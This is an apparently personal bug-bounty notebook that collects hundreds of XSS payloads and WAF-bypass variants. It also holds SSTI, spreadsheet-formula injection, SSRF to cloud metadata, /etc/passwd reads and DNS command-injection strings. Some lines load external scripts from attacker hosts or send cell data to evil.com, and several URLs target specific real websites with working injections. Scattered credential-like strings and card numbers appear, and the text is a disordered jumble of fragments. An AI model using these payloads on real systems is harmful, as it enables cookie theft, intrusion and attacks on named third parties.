'"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')> '"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')>
imgsrc-onerroralertname
<div class="mb-20 bio-area">
"></img><img src=x onerror=confirm(/Xss-By-Arafat/)>/
</textarea><ScRiPt>prompt(/920065/)</ScRiPt//
"><iframe/onload=alert(document.domain)//
"><iframe/src=javascript%26colon;[document.domain].find(alert)>
<vipin oncopy =prompt(document.domain)>
" ="" '><svg onload=setInterval`prompt\x28document.domain\x29`
{{constructor.constructor('alert(1)')()}}
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
&lt;--`</a></script></svg><img src="`" onerror="alert(1)"> --!&gt; https://bitsrc.io/
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<a href=javas&#99;ript:alert(1)>
<details open ontoggle=alert(00)>
qwe<details open ontoggle=alert.apply(self,[document.domain])>qwe
'"\><img/src='1'onerror=alert(777)>{{7*7}}
javascript:x=’http://x.c’;alert(‘xss’);//
”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/>
<a href=javas&#99;ript:alert(1)>javascript:x=
</script><svg/onload=confirm(/yeasir/)>
"></script><svg/onload=confirm(/yeasir/)>
</ScRiPt//"><iframe/onload=alert(document.domain)//
https://github.com/streaak/keyhacks
<a"/onclick=(confirm)(1)><click here!
test<img src=x onerror=alert(document.domain) x=y
<div></svg.onload”=”confirm(domain)””/></div>
<img src=x
onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
"><img src=x Onerror="top[8680439..toString(30)](document.cookie)">
"><noscript><p title="</noscript><img src=x onerror=alert(1)>">
"><object/onerror=prompt`1`//
(A("onerror='alert`1`'testacd))/
" onfocus=alert;throw `1` autofocus>
%27-((alert))(document.cookie)-%27
test';alert(document.domain);'
test";prompt`document.domain`; var x="1
);}};prompt(document.domain);function require(test){};function lol(){switch (1){case 1:console.log(1
;<svg/onload=x>"></script><svg/onload=(confirm)(document.domain)>
xss"><!--><svg/onload=alert(1)>
"/><script>confirm(1);</script>
<svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))>
Bottom Exotic Payloads
test'"<svg%0aonload=((alert))(document.cookie)//
https://18.222.108.105:80/ssrf.html
" ="" '><svg onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>
https://www.photoaffections.com/custom-blankets/personal-creation-p-62000?option_id=886&qty=1&paper=%27-alert(%22xss%20fired%22)-%27
https://www.photoaffections.com/custom-mugs/create-your-own-p-58377?view=%27-alert(1)-%27&qty=1
https://www.photoaffections.com/canvas-prints/create_item.php?item_id=45322013&custom_service_id=&customer_comments="><iframe/onload=alert(document.cookie)//&proof_requested=1&isAjax=true&stepedge=1
https://www.pollardwater.com/misc/ajax/getContractAndStoreOfAccount.jsp?selectedAccountId=610&selectedBranchId=POLLARDWTR%27
Php 7.1.x
?a=ls
%3Cimg src='null' onerror=alert('Xss')%3E
%3Cimg src onerror=%26emsp;prompt`${document.domain}`%3E
<svg/OnLoad="`${prompt``}`">
ZI4XPJYV4
SRT_z1np0f2a14
Bcpsc22@
TE.CL
Note To send this request using Burp Repeater, you must first go to the Repeater menu and make sure that the “Update Content-Length” option is unchecked. You need to include the ending sequence \ r \ n \ r \ n after the last 0.
]]]
https://memn0ps.github.io/2019/09/13/HTTP-Request-Smuggling-CL-TE.html
<svg/onload=x>"></script><svg/onload=confirm(/123/)>
"onmouseover=prompt(document.domain);//
'onmouseover=prompt(document.domain);//
<x onauxclick=a=alert,a(domain)>click
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
“<script src=//xsshere?”@email.com
“1-’or’1'=’1”@email.com
WAF BYPASS PAYLOAD+
<a%20onclick="document.write(document.cookie);">/
%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e
<object/data="javascript&colon;alert/**/(document.domain)">//
"></a><object/data="javascript&colon;alert/**/(document.domain)">//
%22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick
constant<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>
<svg<0x0c>onload=alert(1)><svg>
'><details/open/ontoggle=confirm(document.location)>
<style/><img src="z'z</style><script/z>alert(1)</script>">
<</div>script</div>>alert()<</div>/script</div>>
<svg><b><style><img id="&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;">
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload\r\n=$.globalEval("al"+"ert()");>
<svg/onload=self[`aler`%2b`t`]`1`>
“><svg/on</script>load=alert`1`>
"--!><svg/onload=prompt(/1234/)>"
"xss"><!--><svg/onload=alert(document.domain)>"
<svg id=javascript:alert(10) onload=location=id>
1'"()&%<%20><ScRiPt >prompt(1)</ScRiPt>
'-`aler`%2B`t`]`1`-'
alert\\`1\\`
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
><embed src=//14.rs>
<script src=//14.rs></script>
<script src="(https)://14.rs"></script>
"><script src=https://xssbyyeasir.xss.ht></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzYnl5ZWFzaXIueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>
<iframe+src%3d"http%3a//169.254.169.254/latest/user-data">xss</iframe>
X-Forwarded-For:- <a href=”attacker.com”><h1><font color=”red”>Please click here to login to your account<h1></font></a>
6.31y7hu
%2526%2Bnslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2527%255c%2522%25600%2526nslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2560%2527
"><img src=x onerror="document.body.innerHTML='modified';alert(document.cookie);">
<form><button formaction="javascript:alert(123)">xss<noscript></noscript></button></form>
"><d3v/onauxclick=[2].some(confirm)>click
<<scrip<scriptT>alert(1);
4320909150006705 05/2022 300
Number: 4111111111111111
Date: 03/30
CVV: 737
'"()<tbm><ScRiPt >prompt(/XSSPOSED/)</ScRiPt>
<a href="&#x3000;javascript:alert(1)">CLICKME</a>
{ 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'>
{ 2 }; "></tag><svg onload=alert(spyerror)>
- x" onerror="alert(document.domain)
xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!--
--></title></script></iframe></style></textarea></span><svg/onload=alert(String.fromCharCode(49))>
"><object/onerror=prompt`1`//e&discount;=0JAVASCript:/*-/*`/*\`/*%27/*"/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=prompt(%27openbugbounty%27)//>\x3e
"%27--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script%20/K>(confirm)(%27OpenBugBounty%27)</Script/>
<script>alert(1)</script>’”;}) alert(1);><link/onload=alert(1)>
"'--<input type=text autofocus onfocus=(prompt)(document.domain) <!--//'></input>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
&#x3C;img src=x onerror=alert(document.domain)&#x3E;TEST
<img src='1' onerror='alert(0)' <y
"><svg/onload=alert(/2/);>
<script>alert(atob("SGVyZSBpcyB0aGUgWFNT"))</script>
<script type="module">import'data:text/javascript;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ'</script>
"><frameset/onpageshow=alert(/X/)>
<input onfocus=prompt(document.domain) autofocus>"-->
"/**/autofocus/**/onfocus="alert('XSSPOSED');"
"></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>
;print(md5(xss)); set|set&set
</input><input type=``text``//;valaue=`` autofocus onfocus=alert(1) a=``>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert&#40;&#39;1&#39;&#41</x>
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
{{7*7}}<!--#exec cmd="cat /etc/passwd" -->"><iframe/onload=alert(document.domain)//
<sVg/oNloAd=//><sVg/oNloAd=alert("XSS2")//>@gmail.com
<!%27/*!"/*!\%27/*\"/*--!><Input/Autofocus/%0D*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>
--></script><script>alert(document.domain);//
\”}})})-confirm`1`;(function(){({if(){/*///
\”}})})-confirm`1`(a=>{({b:{/*///
\”-confirm`1`//
“-prompt`1`-”//
\u0027-confirm`1`-\u0027
';alert(/OPENBUGBOUNTY/)//
'-onfocus=alert(document.domain)-'
javascript:alert(1);//
javascript:alert(document.domain)
"onmouseover="prompt(document.domain)
h/<\i<script>alert("i");</script>
"><marquee><IMG src=x onmouseover=prompt(document.domain);></marquee>
https://www.playstation.com/en-us/search/?q=" /><script>alert(1);//
'-confirm(document.domain)-'
"><img/src='1'onerror=alert(1)>
"><svg/onload=alert(domain)>
"><script>alert('xss')</script>
"><img src=x onerror=alert(domain)>@ymail.com
"><img src=x onerror=prompt(document.domain)>"
"> <img src="x" onerror="prompt(domain)"></img> Hackthegif
#"><img src=c onerror=alert(1)>/
#//><img src=x><svg/onload=confirm("Xss-By-Arafat")>/
</script><video src=x onerror=alert(document.domain)>
"></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>
javascript://google.com/?%0aalert(document.domain)
&lt;img src=x onerror=prompt(999)&gt;
&#34;&#62;&#60;img/src=1 onerror=alert(1)&#62;
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%280%29%3E
aaa">fffff</script><script>alert(document.domain)</script>aaaaa
"></title><img src=1 onerror=prompt(document.domain)>
%27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a >> meta tag
0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"
0;data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"HTTP-EQUIV="refresh"
0;http://evil.com"HTTP-EQUIV="refresh"
<input type="text" value="" onmouseover="alert('XSS')">
url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url]

)
javascripT://https://google.com%0aalert(1);//https://google.com
javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.com
%03javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.coms
%00javascript://yeasir.com/%E2%80%A8alert(document.domain)//https://yeasir.com
https://airvpn.org/external_link/?url=%03javascript://deals.razerzone.com/%E2%80%A8alert(document.domain)//https://deals.razerzone.comsdfs%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
<?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain&#x29;</x:script>
“><?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg"><polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/><script type=”text/javascript”>alert(document.location);</script></svg>
This is an outdated page. You will now be redirected to our new page"); window.location="https://google.com"//
JaVaScRiPT%0a:alert(document.cookie);/////
java%0d%0ascript%0d%0a:alert(0)
javascript:new%20Function`al\ert\`2222\``;
javascript://www.whitelisteddomain.tld?%a0alert%281%29
<form><button formaction="javascript:alert(123)">xss
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
=HYPERLINK(“http://evil.com?x=”&A3&”,”&B3&”[CR]”,”Error fetching info: Click me to resolve.”)
=cmd|'/C calc'!A0
=cmd|' /C calc'!A0
=cmd|’ /C notepad’!’A1′
;=2+5+cmd|' /C calc'!A0
=2+2
{7*7}
%{2+2}
%{%{2+2}}
{{7*7}}<!--#exec cmd="cat /etc/passwd" -->
&#x3C;img/src=&#x60;%00&#x60; onerror=this.onerror=alert(document.cooki)
<svg/on<script>load=prompt(document.domain);>”/><svg/on<script>load=prompt(document.cookie);>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>
<b"/onauxclick='-alert(1);'>XXS
The payload will run in all the context.
Eg -
<input type="text" value="<b"/onauxclick='-alert(1);'>XXS">
<b"/onauxclick='-alert(2);'>XXS
yeasir"><h1><a/href="javascript&colon;alert&lpar;document&period;domain&rpar;">click_me</a>arafat_is_html_injection.....<style>h1{background-color:red;color:yellow;}
<script>
var test='<b"/onauxclick='-alert(3);'>TEST';
</script>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<noscript><p title="</noscript><svg/onload=alert(45)>">
<noframes><p title="</noframes><svg/onload=alert(45)>">
<iframe><p title="</iframe><svg/onload=alert(45)>">
<xmp><p title="</xmp><svg/onload=alert(45)>">
[11:48 AM, 4/12/2019] Yeasir Arafat: " onload="javascript:alert('XSS Example')
[11:49 AM, 4/12/2019] Yeasir Arafat: " onload="alert(String.fromCharCode(88,83,83))
https://google.com\'onmouseover='prompt(1)'
<div id="document.domain"><svg><style>&lt;img/src=x onerror=prompt(document.domain)// </br>//["`-->]]>]</div>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>
<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>
"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
<iframe src=%22404%22 onload=%22top.frames[0].document.(%26quot;<script>r=new XMLHttpRequest();r.open('POST','https://www.facebook.com',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<sCrIpt>alert(1)</ScRipt>
<script x>
<script x>alert('XSS')<script y>
<img src='1' onerror='alert(0)' <
String.fromCharCode(88,83,83)
http://localhost/bla.php?test=</script><script>alert(1)</script>
<html>
<script>
<?php echo 'foo="text '.$_GET['test'].'";';`?>
</script>
</html>
Bypass quotes in mousedown event
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
<script>window['alert'](document['domain'])<script>
alert`1`
Bypass onxxxx= blacklist
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
<img src='1' onerror/=alert(0) />
<img/src='1'/onerror=alert(0)>
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
<script>
foo="text </script><script>alert(1)</script>";
</script>
#JS/URL polyglot"
data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
#WASM
https://vulnerabledoma.in/polyglot/wasmjscsshtml.html
#BlindXSS
'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1)>
#xss
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
#xss2
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
#xss3
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 
#sqli
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
https://medium.com/@arbazhussain/stored-xss-on-rockstar-game-c008ec18d071
Rules >
http://h1.nobbd.de/
http://bugbountyworld.com/
https://medium.com/@phwd
https://whitton.io/
https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c
Facebook>>
https://web.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001?_rdc=1&_rdr
https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71
PostMessage-XSS:
<body onload="hack()"><script> function hack(){ window.parent.postMessage( {"location":null, "text":null, "html": null, "base64": null}, "*"); }</script></body>
https://challenge.intigriti.io/#data:text/html;alert(document.domain);base64,PGJvZHkgb25sb2FkPSJoYWNrKCkiPjxzY3JpcHQ+IGZ1bmN0aW9uIGhhY2soKXsgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSggeyJsb2NhdGlvbiI6bnVsbCwgInRleHQiOm51bGwsICJodG1sIjogbnVsbCwgImJhc2U2NCI6IG51bGx9LCAiKiIpOyB9PC9zY3JpcHQ+PC9ib2R5Pg
https://challenge.intigriti.io/?#data:text/html;lol=alert(document.domain)//;base64,PHNjcmlwdD5zZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cGFyZW50LnBvc3RNZXNzYWdlKHsidGV4dCI6IDEsICJodG1sIjogMiwgImJhc2U2NCI6IDN9LCAiKiIpO30sIDE1MDApPC9zY3JpcHQ+ICAg
&
</script><script>alert(document.domain)</script>
"'--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>#
eeee<%2fscript><script>prompt(/XSS/.source)<%2fscript>yyyy
<!'/*"/*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>#
%3C!%27/*%22/*\%27/*\%22/*--%3E%3C/Script/%3E%3CScript%3Econfirm(document.domain)%3C/Script/%3E#
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<SCRIPT>alert();</SCRIPT>"><<SCRIPT>alert();</SCRIPT>img src=x onerror=alert(1);><SCRIPT>alert();</SCRIPT>
<SCRIPT>alert();</SCRIPT>"><<SCRIPT></SCRIPT>img src=x onerror=alert(1);><SCRIPT>alert();</SCRIPT>
&lt;--`</a></script></svg><img src="`" onerror="alert(1)"> --!&gt;
</x></svg><iframe src="" srcdoc="&lt;svg onload=alert(15)&gt;">{{7*7}}
<script src="data:text/javascript,alert(1)"></script>
<a onmouseover="alert(document.cookie)">xxs link</a>
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
#<iframe src=javascript:alert(document.domain) />
><marquee onstart=alert(1233)>test
alert(document.getElementsByName(%22SAMLResponse%22)[0].defaultValue);//
"><h1><a/href="javascript&colon;alert&lpar;document&period;domain&rpar;">click_me</a>this_is_html_injection.....<style>h1{background-color:red;color:yellow;}
"><iframe/onload=aaaaajavascript&colon;alert&lpar;document&period;domain&rpar;>
></span><p onmouseover='p=~[];p={___:++p,$$$$:(![]+"")[p],__$:++p,$_$_:(![]+"")[p],_$_:++p,$_$$:({}+"")[p],$$_$:(p[p]+"")[p],_$$:++p,$$$_:(!""+"")[p],$__:++p,$_$:++p,$$__:({}+"")[p],$$_:++p,$$$:++p,$___:++p,$__$:++p};p.$_=(p.$_=p+"")[p.$_$]+(p._$=p.$_[p.__$])+(p.$$=(p.$+"")[p.__$])+((!p)+"")[p._$$]+(p.__=p.$_[p.$$_])+(p.$=(!""+"")[p.__$])+(p._=(!""+"")[p._$_])+p.$_[p.$_$]+p.__+p._$+p.$;p.$$=p.$+(!""+"")[p._$$]+p.__+p._+p.$+p.$$;p.$=(p.___)[p.$_][p.$_];p.$(p.$(p.$$+"\""+p.$_$_+(![]+"")[p._$_]+p.$$$_+"\\"+p.__$+p.$$_+p._$_+p.__+"(\\\"\\"+p.__$+p.__$+p.___+p.$$$_+(![]+"")[p._$_]+(![]+"")[p._$_]+p._$+",\\"+p.$__+p.___+"\\"+p.__$+p.__$+p._$_+p.$_$_+"\\"+p.__$+p.$$_+p.$$_+p.$_$_+"\\"+p.__$+p._$_+p._$$+p.$$__+"\\"+p.__$+p.$$_+p._$_+"\\"+p.__$+p.$_$+p.__$+"\\"+p.__$+p.$$_+p.___+p.__+"\\\"\\"+p.$__+p.___+")"+"\"")())();'>
XSS<svg/onload="eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41));">
</title><svg onload="&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000100&#0000111&#0000099&#0000117&#0000109&#0000101&#0000110&#0000116&#0000046&#0000100&#0000111&#0000109&#0000097&#0000105&#0000110&#0000041">
XSS<img src='a'/onerror='eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));'/>
<var onmouseover="prompt(document.cookie)">x275</var>
01721037692 https://vulnerabilities.in/blog/
https://medium.com/@ozguralp/simple-remote-code-execution-vulnerability-examples-for-beginners-985867878311
https://medium.com/@mohdaltaf163/uploading-backdoor-for-fun-and-profit-rce-db-cred-p1-2cdaa00e2125
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
cat+/etc/passwd
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>
𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<img src=x onError=import('//1152848220/')>
<img src=x onError=import('//3627734734/')>
http://3627734734
teste"><javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(document.domain)
teste"><javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/confirm`1`
testtest<a%20href="javascript&colon;alert(document.domain)">testtest
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
<img src=x onError=import('//1152848220/')>
<uu src=@'@' onbigclick=import('//0a"&nbsp;"0a0a?0a/')>mou%09se<|/uu>:}
<svg/OnLoad="`${prompt``}`">
Imperva Waf XSS ByPass :
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<svg onload="alert(1)" <="" svg=""
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/cure53/H5SC/tree/master/attachments
https://130.211.16.246/www/EasyToBuy/ShareOfVoice?retailer='-onfocus=alert(document.domain)-'
https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceRetailerData?retailer=
https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceProductsData?category=&header=Top%205%20Competitors&label='-confirm(1)-'
?a=`+alert(document.domain);//&x=%22oncut=%22eval(%27`%27%2bURL)'
Python Flask SSTI Payloads and tricks
* {{url_for.__globals__}}
* {{request.environ}}
* {{config}}
*`{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}`
* {{self}}
* request|attr('__class__') == request.__class__ == request[\x5f\x5fclass\x5f\x5f]
<img src="x" onerror="document.write(window.location)" />
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
https://memberssl.auction.co.kr/Common/CustomizedVerification/VerifyIdentityByCellphone.aspx?nrequestseq=132421452&calltype=U&nexturl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx%26RequestSeqNo%3diac132421452%26callPageType%3dU%26certType%3dZ&cancelurl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx&refertype=&ispossiblecreditauth=Y
https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&ctype=U&next=javascript:confirm(1);//
https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&ctype=U&next=https%3a%2f%2fmemberssl.auction.co.kr%2fCommon%2fVerifyMainResult.aspx%3freferType%3d%26url%3djavascript:confirm(1);//
</div>
'"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')>